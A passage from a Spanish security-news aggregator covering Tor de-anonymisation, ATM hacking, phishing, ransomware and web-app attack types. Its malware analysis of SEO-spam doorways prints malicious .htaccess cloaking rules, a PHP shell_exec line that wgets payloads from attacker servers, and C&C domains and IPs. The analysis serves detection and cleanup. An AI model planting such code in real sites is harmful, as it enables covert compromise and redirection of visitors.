A raíz de aquello surgió una investigación paralela tras la cual el juez federal Robert J.Bryanordenó al FBI revelar qué técnicas había utilizado para hackear la red anónima, de forma que pudiera arrojar luz a los letrados de la defensa de los usuarios. Pero la agencia federal junto con el propio Departamento de Justicia han pedido mediante una apelación al juez que reconsidere la petición, ya que no están dispuestos a desentrañar las herramientas malware que se emplearon para identificar a los usuarios de la red.


El FBI tiene una causa abierta en la que se le acusa de haber pagado 1 millón de dólares a la Universidad de Carnegie Mellon por el desarrollo de una herramienta informática que permitiera violar el anonimato de TOR, pero parece que tras la negativa de Apple en el caso del desbloqueo del iPhone, no están dispuestos a conceder más victorias legales en este tipo de casos peliagudos.


Fuente:http://www.adslzone.net/


Noticias de seguridad informática

Hackear cajeros automáticos es cada vez más fácil

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-informatica/hackear-cajeros-automaticos-es-cada-vez-mas-facil/
TAGS: ATM, USB y COM, Windows XP

Los cajeros automáticos cada día son más fáciles de hackear. Los bancos no parecen preocuparse por el ordenador que llevan y en la mayoría de los casos son muy vulnerables.


Los ciberdelincuentes lo saben y están aprovechando este fallo, que consiste básicamente en proteger el acceso al depósito y dispensador de billetes, pero no el ordenador.


Para empezar, muchos cajeros automáticos todavía cuentan con Windows XP, el sistema operativo que ya no recibe actualizaciones de soporte y que realmente cuenta con un sistema de seguridad muy anticuado, por lo que es realmente vulnerable, y más para un tema como el que hablamos.


Por otro lado, los cajeros automáticos suelen contar con reproductores Flash desactualizados y que cuentan con miles de errores de todo tipo, incluidos de seguridad. Igualmente, tampoco suele haber soluciones de antivirus para proteger los cajeros, como indican desde Kaspersky Lab.


Imagen - Hackear cajeros automáticos es cada vez más fácil


Además, se advierte que el deposito suele estar blindado para evita el robo directo de dinero, pero en cambio el ordenador se protege únicamente por una carcasa de plástico o un fino metal. Con esto queremos decir que es fácil acceder a los puertos USB y COM de los que disponen estos ordenadores.


Si el atacante es capaz de usar el puerto USB puede introducir software malicioso para hackear fácilmente el cajero del banco.


Por último, los cajeros están conectados a Internet o a redes, por lo que finalmente a la red de las redes. Y precisamente parece que gran cantidad de cajeros de bancos están accesibles a través del motor de búsqueda Shodan.


Últimamente se dan más casos de robo de cajeros a través de los puertos USB, o lo que es peor, a través de Internet. Para ello, se inserta malware en los mismos como los creadores por el grupo Carbanak, que consiguió 1.000 millones de dólares gracias a los cajeros automáticos.


Fuente:http://www.elgrupoinformatico.com/


Noticias de seguridad informática

Hackers usan correos de MasterCard para robar datos personales

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-informatica/hackers-usan-correos-de-mastercard-para-robar-datos-personales/
TAGS: hacker, MasterCard

Al igual que el caso de Visa, estos correos falson son enviados a través de MasterCard para robar información de los usuarios. La compañía de seguridad Eset alertó sobre una nueva campaña de phishing (malware que roba información personal), que circula utilizando la identidad de la entidad financiera MasterCard para obtener datos de sus clientes.


Este hallazgo sucede pocos días después de identificar un caso similar pero vinculado a otra reconocida emisora de tarjetas de crédito, Visa, en una campaña en que los hackers usaban sitios gubernamentales.


Hackers usan correos de MasterCard para robar datos personales

En este nuevo ataque relacionado a MasterCard, la víctima recibe un correo que simula provenir de una dirección oficial (eresumen@masterconsultas.com.ar), dándole una apariencia legítima. Además, el correo está encabezado con el saludo “Estimado socio”, una herramienta clásica de este tipo de estafas, en las cuales se utiliza la tercera persona para dirigirse al usuario.


Tanto en el mensaje como en el asunto del correo se alerta al usuario de que su servicio será suspendido. Luego, se lo invita a procesar una reactivación del servicio indicándole una URL y, al hacer clic, es redireccionado a otro sitio donde se le solicita que complete los campos con la mayor cantidad de datos personales y bancarios posibles.


Cuando la víctima carga todos los datos y da clic sobre el botón de validar, toda la información almacenada en el formulario queda en manos del hacker.


Una vez cargada la información, el usuario observa una imagen que indica que sus datos se están procesando y después de unos segundos el portal falso muestra un mensaje en donde parecería que la verificación fue exitosa.


Automáticamente, luego de esta operación, la víctima es direccionada a un portal similar al de la entidad afectada pero con todos los enlaces apuntando a la página oficial de MasterCard. Cuando el usuario ingrese nuevamente sus credenciales en el sitio, podrá acceder sin mayores problemas al sistema sin notar que el correo inicial se trataba de una trampa.


“Día a día vemos cómo distintas técnicas de estafas van evolucionando y este es un ejemplo de cómo el phishing tradicional está migrando para mantener las campañas activas durante un mayor período de tiempo, por lo cual probablemente se capture un número más elevado de credenciales financieras robadas", comentó Lucas Paus, Especialista en Seguridad Informática deEset Latinoamérica.


"Aconsejamos a los usuarios a estar atentos a la información que reciben por más que a simple vista parezca confiable. La prevención es el mejor aliado al tratarse de información tan sensible como son los datos bancarios” aseguró.


Fuente:http://elcomercio.pe/


Noticias de seguridad informática

Tuesday, 29 March 2016

Sitios Hackeados Redireccionan para Porno desde Links de PDF / DOC

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/sitios-hackeados-redireccionan-para-porno-desde-links-de-pdf-doc/
TAGS: DOC, PDF, SEO blackhat

Hemos escrito mucho acerca de los distintos tipos de hacks de SEO blackhat en este blog y la mayoría de ustedes ya conocen conceptos como
doorways, cloaking y SEO poisoning. Esta vez , vamos a hablar de otro ataque de SEO que estamos viendo desde el año pasado .


Vamos a empezar con los síntomas :



  1. Cuando alguien hace clic en los resultados de búsqueda en Google, Bing o Yahoo es redirigido a sitios web de pornografía. En todos los demás casos, no se producen redireccionamientos.

  2. Sólo las páginas reales y legítimas redirigen. No hay nuevas doorways (como suele ocurrir en los hacks de spam farmacéuticos y en los spam de réplicas).

  3. No todas las páginas reales redirigen a sitios web de pornografía (por ejemplo, páginas iniciales rara vez redirigen) y las que redirigen, lo hacen siempre.

  4. Esto ocurre con todos los tipos de sitios: WordPress, foros, sitios personalizados y HTML puro.

  5. Cuando los webmasters comproban el código de las páginas que redireccionan a sitios de pornografía (es fácil hacerlo en sitios HTML puro) no encuentran nada malicioso.

  6. Tras un análisis de las mismas páginas en “Fetch as Google” (via Search Console) o en Unmask Parasites, los webmasters descubren que las páginas contienen muchas palabras clave porno y bloqueo de 20 links porno en sitios web también hackeados.

  7. En los bloqueos de links de spam, se ve links para PDF, DOC, SWF y otros archivos que los servidores ven como descargas o archivos que se pueden abrir sólo con la ayuda de plugins adicionales. Estos links redirigen a sitios de pornografía cuando se abren con Google referrer. Sin el referrer del motor de búsqueda, usted descargaría un archivo real y legítimo.

.Htaccess


Estos síntomas indican que vamos a estar buscando al culpable en el nivel de configuración del sitio web. De hecho, el código siguiente se encontró en el .htaccesspara cada sitio web con los cuales hemos trabajado:


RewriteCond %ENV:REDIRECT_STATUS 200
RewriteRule ^ - [L]
RewriteCond %HTTP_USER_AGENT (google|yahoo|msn|aol|bing) [OR]
RewriteCond %HTTP_REFERER (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ authentically-familiar.php?$1 [L]


La condición rewrite muestra que todas las peticiones al servidor de bots de los motores de búsqueda que vienen de los resultados de los motores de búsqueda se dirigen de nuevo a un script de doorway (cuyo nombre es diferente en cada sitio web, pero siempre es una combinación de dos palabras reales, como bray-anointing.php,biomedical-case.php, ellipsoidal-cruisers.php, etc.)



Script Doorway


Vamos a observar el script doorway para ver como funciona:



Script Doorway

Script Doorway




Al igual que cualquier script cloaking de SEO, el script ofrece diferentes contenidos para bots de motores de búsqueda y para los visitantes humanos. Cualquier solicitud de redirección de este script tendrá como resultado una página 404 para ayudarlo a ocultarse.


Como hemos mencionado en la lista de los síntomas, este script no produce contenido de spam para cada página del sitio web (incluso si puede hacerlo). Sólo lo hace para URLs específicas las cuales encuentra reglas y templates. Estas reglas y templates se almacenan en el directorio temporal global del servidor (por lo general /tmp o/var/tmp) donde ese malware crea un subdirectório (el hash md5 del nombre de dominio se usa como su nombre).



Actualización de las Informaciones del Doorway A Partir del Servidor de Controle


El script tiene un comando especial que descarga estas reglas desde el propio servidor del hacker.


$cmd="cd $tmppath; wget http://update.$domain/arc/$md5host.tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz";
...
echo shell_exec($cmd);


Así que en lugar de los esquemas más difusos en los cuales las doorways se generan directamente en sitios web comprometidos, este ataque genera conjuntos de doorways para cada sitio web comprometido a un servidor remoto y luego usa un comando específico para subirlos. De esta manera, se puede actualizar el contenido de la doorway cada vez que desee. Este enfoque combina la velocidad de doorways estáticos y la flexibilidad de doorways dinámicos que siempre van a buscar contenido desde servidores remotos.


Los hackers han usado los siguientes servidores C&C:



  • f.menyudnya[.]com – 195.154.73.79 (update.f.menyudnya.com195.154.73.79 and 78.46.100.45)

  • k-fish-ka[.]ru -195.154.165.135 (update.k-fish-ka.ru 195.154.165.135)

  • x3.megalolik[.]com – 46.4.121.189 (update.x3.megalolik.com195.154.73.79)

  • menotepoer[.]com – 46.4.121.189

  • x2.megalolik[.]com – 195.154.165.135

Extensiones de Doorway Inusuales


Ahora, sabemos que los hackers eligen las URLs que actúan como doorways. Así que ¿por qué elegir no sólo las páginas regulares, sino también archivos de documentos que se pueden descargar: PDF, Microsoft Word, etc.? El extracto del script del doorway siguiente explica por qué:

if ($bot)
$pdf+=0;
if ($pdf==1) header("Content-Type: application/pdf");
if ($pdf==2)header("Content-Type: image/png");
if ($pdf==3)header("Content-Type: text/xml");
if ($pdf==4)
$contenttype=@base64_decode($contenttype);
$types=explode("\n",$contenttype);
foreach($types as $val)
$val=trim($val);
if($val!="")header($val);

echo $doorcontent;exit;


Esto probablemente ocurre en la esperanza de que Google notifique estos documentos como spam. Además, dado que el tema de esta campaña blackhat (que es la pornografía), parece más plausible cuando un sitio web tiene links para diversas descargas de medios de comunicación y no para las páginas web convencionales. Para el script de doorway, no importa si se trata de un .html, .php o .pdf – él redirige cualquier solicitud en su lista para direcciones URL elegibles.



Redireccionamientos para Pornografía


A diferencia de contenidos de spam para los motores de búsqueda que se almacenan en caché en el servidor y se pueden actualizar de vez en cuando , el código de redirección para visitantes a los motores de búsqueda siempre se carga desde el servidor remoto.



Código de redireccionamiento para pornografía.

Código de redireccionamiento para pornografía.




Este enfoque permite a los piratas informáticos recopilar información de uso en tiempo real para sus doorways, lo que les permite modificar las URL de redirección de inmediato en todos los doorways de cada sitio web hackeado.


En este momento, los doorways redireccionan para 1empiredirect[.]com que después redirecciona para muchas otras URLs intermediarias, como cdn.nezlobudnya[.]comhstraffa[.]comspaces.slimspots[.]com, etc, que, por su vez, elige las páginas se basando en la dirección IP del visitante, sea en el tráfico móvil u otro tráfico.


La siguiente es una típica respuesta de redireccionamiento generada por doorways:



Respuesta de redireccionamiento

Respuesta de redireccionamiento




Puertas Traseras


El script del doorway de .htaccess no es el único archivo PHP malicioso que los hackers usan. En los sitios web comprometidos, a menudo se encuentran muchos scripts duplicadas (mismo contenido pero ofuscación ligeramente diferente) en varios subdirectorios. Los nombres de archivo también siguen el mismo patrón: word1-word2.php, donde word1 y word2 son palabras inglesas totalmente al azar.


El amor por las palabras aleatorias no termina aquí. Este ataque también utiliza dos tipos de puertas traseras dispersas en diferentes subdirectorios.



Tipo 1

El primer tipo utiliza nombres de archivos más largos, tales como nav-menu-accentuate-carrion.php, icon-pointer-2x_indesit.php, etc. El contenido ofuscado de estos archivos es muy corto :



Puerta trasera tipo 1

Puerta trasera tipo 1




Tipo 2

El segundo tipo utiliza combinaciones de caracteres completamente al azar (generalmente 8 caracteres) para los nombres de archivo como fgrvgnjp.php,giaatmes.php, lddkwvis.php, etc., pero su código ofuscado (y mucho más grande) usa muchas palabras al azar como variables:



Puerta trasera tipo 2

Puerta trasera tipo 2




Para se decodificar, todos tipos de puertas traseras hacen prácticamente lo mismo: se ejecuta el código PHP en las cabeceras HTTP personalizadas.



Limpieza


Si su sitio web ha sido afectado por este ataque, es necesario



  1. Encontrar y remover todas las puertas traseras (tipos 1 y 2).

  2. Remover el código malicioso del .htaccess.

  3. Encontrar y remover todos los scripts de doorway.

  4. En casos raros, es posible encontrar datos de doorway almacenados en un subdirectorio de su sitio web (su nombre debe ser un número hex de 32 dígitos). Eso también se debe eliminar.

  5. Cambiar todas las contraseñas del sitio web: FTP, CMS, etc.

  6. Confirmar que todo software utilizado en su página web (sitios web, utilizando una cuenta con varios sitios web) se actualizan y se parchean.

  7. Dado que muchos de estos sitios web afectados por esta campaña de BlackHat de SEO son notificados por Google “puede estar hackeado“, se debe usar el Search Console para notificar a Google después de limpiar el sitio web.

O puede llamar a los profesionales que harán todo eso por usted. En nuestro post reciente, se puede comprender cómo limpiamos a los sitios web hackeados.


Fuente:https://blog.sucuri.net


Noticias de seguridad informática

Un fallo en TrueCaller expone datos de usuarios Android

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/vulnerabilidades/un-fallo-en-truecaller-expone-datos-de-usuarios-android/
TAGS: Truecaller

Seguro que más de uno conoce esta aplicación que permite gestionar de una forma relativamente sencilla las llamadas y los mensajes entrantes en el terminal móvil, en este caso con sistema operativo de los de Mountain View. Expertos en seguridad han detectado un fallo de seguridad en TrueCaller que permitiría la exposición de los datos de los usuarios.


La aplicación permite por ejemplo escoger de qué números de teléfono se quiere bloquear las llamadas entrantes o incluso mensajes de texto, pudiendo categorizar estos como spam. Teniendo en cuenta que la aplicación se encuentra disponibles para Android, iOS, Windows Phone, Symbian y Blackberry, sorprende bastante a los expertos que el problema de seguridad esté acotado solo a los terminales con el primero de los sistemas operativos que se encuentran en el listado.


Para todo aquel que no haya utilizado la aplicación hasta este momento, vamos a tratar de ponerle en antecedentes. Cuando un usuario instala la aplicación y se ejecuta por primera vez, solicita al usuario introducir una serie de datos, como por ejemplo el número de teléfono, la dirección de correo electrónico u otros datos personales que posteriormente son verificados utilizando un mensaje de texto. Posteriormente la aplicación no necesita ningún dato más y solo hace uso del IMEI para verificar la identidad del dispositivo.


Es este el problema que han detectado, ya que investigadores de Cheetah Mobile han reconocido que se puede interactuar con el servidor y enviar códigos IMEI generados de forma aleatoria y recibir en muchos casos respuesta con datos relacionados con ese dispositivo.




El sistema de autenticación de TrueCaller no es el adecuado


El problema es que este error permite el acceso a toda la información facilitada por el usuario y no solo eso, también permite modificar esta y solo interactuando con el IMEI. Teniendo en cuenta la cantidad de amenazas existentes en la actualidad que recopilan los datos de los terminales de los usuarios parece sencillo que estos se hagan con este código y puedan utilizarlo de forma fraudulenta, por ejemplo ante esta vulnerabilidad.


Sabiendo que la aplicación está instalada en cien millones de dispositivos Android, desde la aplicación recomienda actualizar a la última versión que ya se encuentra disponible y que permite resolver este problema, o al menos que no se permita acceder a la información de las cuentas sin el consentimiento del usuario.


Esta vulnerabilidad solo es explotable desde el dispositivo Android y aunque parece que no existe en otros sistemas operativos, los responsables del servicio han guardado silencio al respecto.


Fuente:http://www.redeszone.net/


Noticias de seguridad informática

¿Cuáles son los riesgos y ataques de seguridad en aplicaciones web?

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/tecnologia/cuales-son-los-riesgos-y-ataques-de-seguridad-en-aplicaciones-web/
TAGS: seguridad de aplicaciones web, seguridad Páginas web, seguridad sitios web
Los sitios web y aplicaciones web son sistemas empresariales de misión crítica que deben funcionar sin problemas de seguridad para procesar datos confidenciales empresariales. Por los motivos de las normas de protección de datos personales, empresas deben considerar seguridad para aplicaciones web. Existen evidencias estadísticas avaladas por empresas de seguridad de aplicaciones cual señalan que en los países como México, Brasil, Estados Unidos, Colombia, Costa Rica, Argentina, UAE, India; dos de cada tres empresas enfrentan riesgos y problemas de seguridad para aplicaciones web o seguridad en páginas web.

Consultores de auditoría de sitio web, clasifican los riesgos por el tipo de ataque. Usando el tipo de ataque como base es el método normalmente usado por empresas de seguridad de aplicaciones. La clasificación de riesgos de seguridad web es de excepcional valor para los desarrolladores de aplicaciones, ejecutivos de la empresa, profesionales de la seguridad o cualquier otro interesado en la auditoría de sitio web. Profesionales de TI normalmente aprenden sobre riesgos informáticos, ataques a nivel aplicación, auditoría de sitio web, seguridad web con ayuda de los cursos de seguridad web. En los países como México, Brasil, Estados Unidos, Colombia, Costa Rica, Argentina, UAE, India etc hay varias empresas de seguridad de aplicaciones que proporcionan capacitaciones y cursos de seguridad web. Pero profesionales de las empresas deben tomar el curso de seguridad web que le enseña metodologías de revisión de seguridad independientes, guías de programación segura, normas internacionales, pruebas de seguridad web, metodologías de explotación, y ataques a nivel aplicación.
A continuación son algunos de ataques que afectan la seguridad de aplicaciones web:

Fuerza bruta


Fuerza bruta es un ataque automatizado de prueba y error, utilizado para adivinar los valores (usuarios, contraseña etc.) de los parámetros de la aplicación/pagina web. Normalmente gente usan contraseñas o claves criptográficas débiles que son fáciles de adivinar. Los hackers explotan esta vulnerabilidad de seguridad en páginas web usando un diccionario. Los hackers empiezan un bucle recorriendo el diccionario término a término, en búsqueda de la contraseña válida. Según los expertos de servicios de seguridad en aplicaciones web, el ataque de fuerza bruta es muy popular y pueden llevar a cabo horas, semanas o años en completarse. Con auditoría de sitio web empresas pueden detectar fácilmente las vulnerabilidades relacionadas a fuerza bruta.

Autenticación incompleta y débil validación


Autenticación incompleta es un ataque cuando un hacker accede alguna funcionalidad sensible de la aplicación sin tener que autenticarse completamente. En este ataque un hacker podría descubrir URL específica de la funcionalidad sensible través de pruebas de fuerza bruta sobre ubicaciones comunes de ficheros y directorios (/admin), mensajes de error etc. Normalmente muchas aplicaciones, páginas web no tienen seguridad y usan las técnicas de seguridad para aplicaciones convencionales. En un ataque de validación débil el atacante pueda obtener, modificar o recuperar los datos, contraseñas de otros usuarios. Esto ocurre cuando los datos requeridos para validar la identidad de los usuarios, son fácilmente predecible o puedan ser falsificadas. Acuerdo con los consultores de empresas de seguridad de aplicaciones, el proceso de validación de datos es una parte importante de las aplicaciones y las empresas deben implementar soluciones de seguridad para aplicaciones. Además con la auditoría de sitio web empresas pueden detectar fácilmente las vulnerabilidades relacionadas a autenticación incompleta y débil validación.

Autorización insuficiente


Autorización insuficiente significa que un usuario tiene acceso a los partes sensibles de la aplicación/ sitio web que deberían requerir un aumento de restricciones de control de acceso. Sin algunas medidas de seguridad para aplicaciones, el ataque de autorización insuficiente podría ser muy dañoso. En el ataque de autorización insuficiente, un usuario autenticado podría controlar todo la aplicación o contenido de la página web. Recomendaciones del curso de seguridad web dicen que las aplicaciones deben tener políticas de acceso, modificación y prudentes restricciones deben guiar la actividad de los usuarios dentro de la aplicación.

Secuestro de sesión


En el ataque de secuestro de sesión un hacker podría deducir o adivinar el valor de sesión id y después puede utilizar ese valor para secuestrar la sesión de otro usuario. Si un hacker es capaz de adivinar la ID de sesión de otro usuario, la actividad fraudulenta es posible. Esto podría permitir a un hacker usar el botón atrás del navegador para acceder las páginas accedidas anteriormente por la víctima. Muchas empresas sin seguridad en páginas web son susceptibles a este ataque. Por esta razón es muy importante tener seguridad para aplicaciones.
Otro problema por seguridad para aplicaciones es la expiración de sesión incompleta, según consultores de empresas de seguridad de aplicaciones. Esto se resulte cuando una página web permite reutilización de credenciales de sesión antigua. La expiración de sesión incompleta incrementa la exposición de las páginas web para que los hackers roben o se secuestren sesión.
La fijación de sesión es otra técnica utilizada por secuestro de sesión, según consultores de empresas de seguridad de aplicaciones. Cuando fuerza un ID de sesión de usuario a un valor explícito, el hacker puede explotar esto para secuestrar la sesión. Posteriormente de que un ID de sesión de usuario ha sido fijado, el hacker esperará para usarlo. Cuando el usuario lo hace, el hacker usa el valor del ID de sesión fijado para secuestro de sesión. Las páginas web que usan las sesiones basadas en cookies sin ningún tipo de seguridad en páginas web, son las más fáciles de atacar. Normalmente la mayoría de ataques de secuestro de sesión tiene la fijación de cookie como motivo.
Sin servicios de seguridad en aplicaciones web contra la fijación de sesión, el hacker puede hacer mucho daño y robar datos confidenciales. Según recomendaciones del curso de seguridad web, el lógico para generar sesión ID, cookie y cada sesión ID deben ser mantenidos confidenciales. Empresas pueden aprender fácilmente durante el curso de seguridad web, mejores prácticas por prevenir secuestro de sesión y hacer programación segura de las aplicaciones.

Cross-site Scripting


Cuando un usuario visita una página web, el usuario espera que haber seguridad en página web y la página web le entregue contenido válido. Cross-site Scripting (XSS) es un ataque donde la víctima es el usuario. En el ataque de XSS, el hacker fuerza una página web a ejecutar un código suministrado en el navegador del usuario. Con este código el hacker tiene la habilidad de leer, modificar y transmitir datos sensibles accesibles por el navegador. Sin ningún tipo de seguridad en páginas web, un hacker podría robar cookie, secuestrar sesiones, abrir páginas de phishing, bajar malware y mucho más utilizando el ataque de XSS. Según expertos de servicios de seguridad en aplicaciones web, hay dos tipos de ataques XSS, persistentes y no persistentes. Ambos ataques pueden causar mucho daño a la reputación de la página web. Con ayuda de soluciones como auditoría de sitio web o cursos de seguridad web, empresas pueden entender, detectar y resolver fácilmente las vulnerabilidades relacionadas a cross-site scripting (XSS).

Desbordamiento de buffer


El desbordamiento de buffer es una vulnerabilidad común en muchos programas, que resulta cuando los datos escritos en la memoria exceden el tamaño reservado en el buffer. Los expertos de empresas de seguridad de aplicaciones, mencionan que durante un ataque de desbordamiento de buffer el atacante explota la vulnerabilidad para alterar el flujo de una aplicación y redirigir el programa para ejecutar código malicioso. Acuerdo con los profesores de cursos de seguridad web esta vulnerabilidad es muy común a nivel a sistema operativo del servidor de la aplicación y empresas pueden detectar durante la auditoría de sitio web y servidor web.

Inyección de código SQL


La inyección de código SQL, también conocido como SQL Injection es un ataque muy común y peligroso. Muchas empresas sin seguridad en páginas web son susceptibles a este ataque. Este ataque explota las páginas web que usan SQL como base de datos y construyen sentencias SQL de datos facilitados por el usuario. En el ataque de inyección de código SQL, el hacker puede modificar una sentencia SQL. Con la explotación de la vulnerabilidad, el hacker puede obtener control total sobre la base de datos o también ejecutar comandos en el sistema. Acuerdo con la experiencia de los expertos de servicios de seguridad en aplicaciones web, las empresas pueden prevenir inyección de código SQL con ayuda de saneamiento de los datos facilitados por el usuario. Además empresas pueden detectar y resolver esta vulnerabilidad con la ayuda de auditoría de sitio web.

Indexación de directorio


En el ataque de indexación de directorio, un atacante puede acceder todos los ficheros del directorio en el servidor. Sin seguridad en páginas web, esto es equivalente a ejecutar un comando “ls” o “dir”, mostrando los resultados en formato HTML. La información de un directorio podría contener información que no se espera ser vista de forma pública. Además un hacker puede encontrar la información sensible en comentarios HTML, mensajes de error y en código fuente. Acuerdo con la experiencia de consultores de empresa de seguridad de aplicaciones, la indexación de directorio puede permitir una fuga de datos que proporcione a un hacker los datos para lanzar un ataque avanzado.

Path Traversal


En el ataque de Path Traversal, un hacker accede los ficheros, directorios y comandos que residen fuera del directorio “root” de la web. Muchos sitios empresariales sin seguridad en páginas web son susceptibles a este ataque. Con acceso a estos directorios, un atacante puede tener accesos a los ejecutables necesarios para realizar la funcionalidad de la aplicación web e información confidencial de usuarios. En el ataque de path traversal un hacker puede manipular una URL de forma que la página web ejecutará o revelará el contenido de ficheros ubicados en cualquier lugar del servidor web. Con ayuda de soluciones como auditoría de aplicación web o capacitación de seguridad web, empresas pueden entender, detectar y resolver fácilmente las vulnerabilidades relacionadas a Path Traversal.

Denegación de servicio


En un ataque de denegación de servicio (DoS), el motivo es impedir que una página web/ aplicación puede funcionar normalmente y sirva la actividad habitual a los usuarios. Los ataques DoS intentan dilapidar todos los recursos disponibles tales como: CPU, memoria, espacio de disco, ancho de banda etc. Cuando estos recursos lleguen un consumo máximo, la aplicación web pasará a estar inaccesible. Según los expertos de servicios de seguridad en aplicaciones web hay diferentes tipos de ataques DoS, como a nivel red, nivel dispositivo, nivel aplicación y de diferentes fuentes (DDoS). Con ayuda de soluciones como auditoría de aplicación web o capacitación de seguridad web, empresas pueden entender, detectar y resolver fácilmente los riesgos relacionados a denegación de servicio.

Estos son algunos de los ataques cibernéticos sobre aplicaciones web. Los servicios de seguridad en aplicaciones web y los cursos de seguridad web deben permitir identificar, resolver los riesgos asociados a las aplicaciones web de su organización. La metodología de seguridad para páginas web/ aplicaciones web debe ser muy diferente de metodología tradicional de empresas de seguridad de aplicaciones. La metodología de seguridad para páginas web/ aplicaciones web debe estar basada en un proceso de pruebas manual y automatizadas por medio de scripts propias, revisión de códigos, herramientas propietarias, comerciales y de código abierto que identifica todos los tipos de vulnerabilidades.

 

Fuente:http://www.iicybersecurity.com/seguridad-para-aplicaciones-web.html
Noticias de seguridad informática

Monday, 28 March 2016

Por qué no debemos utilizar los estándares “FIPS” en la seguridad de nuestra red Wi-Fi

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/tecnologia/por-que-no-debemos-utilizar-los-estandares-fips-en-la-seguridad-de-nuestra-red-wi-fi/
TAGS: FIPS, Wi-Fi

Windows viene con un gran número de opciones y configuraciones que, de normal, son totalmente prescindibles para la mayoría de los usuarios. Una de estas configuraciones es el uso de estándares FIPS, un acrónimo de “Federal Information Processing Standards” (Estándar federal de procesamiento de información), o lo que es lo mismo, un conjunto de reglas pensadas especialmente para entornos gubernamentales. FIPS define ciertos elementos específicos del cifrado de datos tales como los algoritmos a utilizar o los sistemas de generación de claves.


A diferencia de lo que muchos aseguran, utilizar las reglas FIPS no mejora ni la seguridad ni la velocidad de nuestro ordenador ni nuestra conexión a Internet, sino que fuerza al sistema a utilizar únicamente estándares de cifrado que hayan sido aprobados por este conjunto de reglas, bloqueando todos los demás estándares más modernos, libres y seguros y, en muchas ocasiones, haciendo que el ordenador sea más lento, menos funcional y más inseguro que si no utilizamos estas reglas.


Un ejemplo real de uso de reglas FIPS es el uso de criptografía validada solo por este conjunto de reglas, por ejemplo, forzando a las aplicaciones de Windows a hacer uso de conexiones TLS 1.0 en lugar de funcionar a través de SSL 2.0/3.0 o forzar a .Net a utilizar el algoritmo SHA256 más lento que la revisión de este, que no ha sido aprobada por estas reglas.


Aunque sea extraño, el modo FIPS está disponible para todos los usuarios de Windows, sin embargo, Microsoft recomienda activar estos estándares solo en caso de que de verdad sean necesarios, por ejemplo, si intentamos conectarnos desde una red gubernamental donde el uso de reglas FIPS es obligatorio. Aunque cualquier usuario puede habilitar dicha opción fácilmente, tal como vamos a ver a continuación, es recomendable no hacerlo salvo que queramos reducir la velocidad de nuestra red, su seguridad y comprobar cómo se comportaría el sistema si estuviera conectado a una red gubernamental, algo totalmente irrelevante.



Cómo activar/desactivar el uso de los estándares FIPS en nuestro sistema operativo Windows


Normalmente esta configuración suele estar desactivada por defecto, sin embargo, nunca está de más comprobarlo para asegurarnos de que, efectivamente, es así. Para comprobarlo, simplemente debemos seguir los siguientes pasos:



  • Abrimos el panel de control y nos desplazamos hasta “Redes e Internet > Centro de redes y recursos compartidos”.

  • Seleccionamos nuestra red Wi-Fi y abrimos la ventana de propiedades.

  • Pulsamos sobre el botón “Propiedades Inalámbricas”.

  • Pulsamos sobre la pestaña “Seguridad”

  • Pulsamos sobre “Configuración avanzada”

  • Desde esta última pestaña podemos habilitar o deshabilitar fácilmente el uso de los estándares FIPS en dicha red.

Uso estándares FIPS en Windows


También es posible activar o desactivar el uso de estos estándares desde el registro de Windows:



  • Abrimos el editor de registro de Windows.

  • Nos desplazamos hasta la ruta ““HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy\”.

  • Aquí debemos ver una entrada llamada “Enabled”. Si el valor de esta entrada es “1” significa que el uso de estándares FIPS está activado en el sistema. Si es “0”, es que está desactivada.

  • Para cambiar su valor, simplemente debemos hacer doble clic sobre dicha entrada y modificar su valor por el que queramos.

  • Una vez cambiado, reiniciamos el ordenador para que los cambios surtan efecto.

Activar o desactivar FIPS desde Regedit


En resumen, el uso de los estándares FIPS para un uso doméstico es totalmente innecesario e incluso es posible que haga que el sistema pierda velocidad y seguridad frente al uso del resto de estándares. Este modo está pensado tan solo para entornos gubernamentales de Estados Unidos, por lo que de utilizarlo fuera de ellos no tiene su lógica, aunque nos conectemos desde redes gubernamentales españolas, ya que estas tampoco hacen uso de unas reglas tan estrictas como esas.


Fuente:http://www.redeszone.net/


Noticias de seguridad informática

PowerWare, un ransomware que utiliza Microsoft Word y la PowerShell para infectar equipos

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-informatica/powerware-un-ransomware-que-utiliza-microsoft-word-y-la-powershell-para-infectar-equipos/
TAGS: Microsoft Word, PowerWare, ransomware

De nuevo tenemos que hablar de un ransomware y comienza a ser habitual que todas las semanas exista alguna novedad aunque en esta ocasión han sido varias. Expertos en seguridad han detectado la presencia de una amenaza de este tipo en Internet y que se ha bautizado con el nombre de PowerWare. Destacan de ella un modo de operación nunca visto hasta el momento.


Mientras otros malware del mismo tipo recurren a instaladores para llegar al equipo y posteriormente proceder al cifrado de los datos, en esta ocasión la amenaza se sirve de archivos de Microsoft Word con macros y comandos que se ejecutan haciendo uso de la PowerShell de los sistemas operativos Windows para llegar al equipo y proceder posteriormente al cifrado de la información. Pero no nos podemos dejar sorprender por esta táctica de instalación ya que posee mucho de la vieja escuela, como por ejemplo el método de infección, recurriendo sobre todo a correos electrónicos spam aunque hay expertos que afirman que también se puede encontrar en páginas de Internet de descarga de contenidos.


Tal y como nos podemos imaginar y a la vista de todo lo mencionado con anterioridad, en primer lugar se produce la descarga del archivo Word que contiene la macro que provoca la descarga del instalador de la amenaza. Pero para que esto se produzca en primer lugar se debe abandonar el modo seguro de visualización del documento y posteriormente activar esta función que permite la ejecución de esta porción de código. en el propio documento se encuentran instrucciones para realizar dicho proceso, haciendo creer al usuario que sin esta función no se visualizará de forma correcta el contenido.


Una vez hecho esto podría decirse que los archivos (o al menos algunos) están perdidos.


PWa1



PowerWare utiliza la PowerShell para generar la clave de cifrado


Una vez se ha producido la descarga de un ejecutable con el nombre cmd.exe, este interactúa con la línea de comandos generando en primer lugar una clave de cifrado RSA de 2048 bits que se envía al servidor de control remoto. Una vez completado este proceso comienza el cifrado de la información y posteriormente la solicitud de 500 dólares que a priori deberían permitir recuperar el acceso. Pero siempre existen algunos aspectos que ponen en jaque a los ciberdelincuentes y esta amenaza tiene uno.


